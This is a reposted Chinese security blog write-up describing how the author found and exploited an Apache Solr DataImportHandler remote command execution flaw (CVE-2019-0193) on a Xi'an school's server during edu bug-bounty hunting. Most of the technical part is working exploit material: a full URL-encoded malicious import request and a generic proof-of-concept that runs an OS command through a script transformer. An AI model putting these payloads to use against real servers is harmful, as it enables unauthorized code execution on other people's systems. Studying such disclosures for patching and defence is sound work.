西安某校命令执行- CVE-2019-0193

admin 2023年1月9日21:19:59安全文章评论7 views2515字阅读8分23秒阅读模式
  1. 最近在edu src方面进行了一些尝试,同时突然想到没有对该学校进行过测试,在进行一波信息收集之后,也是成功拿到了这个点,简单记录一下。


西安某校命令执行- CVE-2019-0193

2.漏洞影响范围:Apache Solr < 8.2.0

3..西安 XXX 存在 Apache Solr 远程命令执行漏洞(CVE-2019-0193),漏洞地址:http://XXXX/solr/admin/cores?wt=json

西安某校命令执行- CVE-2019-0193

4.命令执行,数据包见附件,如图:数据包:

http://xxxx/solr/admin/cores?wt=json

POST /solr/opac/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,41710%2B43624)%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3EHTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0;rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 72Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9Content-Type: text/htmlUpgrade-Insecure-Requests: 1Accept-Encoding: gzip<?xml version="1.0"encoding="utf-8"?><books><book></book></books>

西安某校命令执行- CVE-2019-0193

5.漏洞利用过程如下:

西安某校命令执行- CVE-2019-0193

西安某校命令执行- CVE-2019-0193

西安某校命令执行- CVE-2019-0193

poc:

POST /solr/<your_core_name>/dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(row){var process= java.lang.Runtime.getRuntime();process.exec("calc");return row;}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>

原文始发于微信公众号(爱喝酒烫头的曹操):西安某校命令执行- CVE-2019-0193

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月9日21:19:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  西安某校命令执行- CVE-2019-0193 http://cn-sec.com/archives/1508149.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: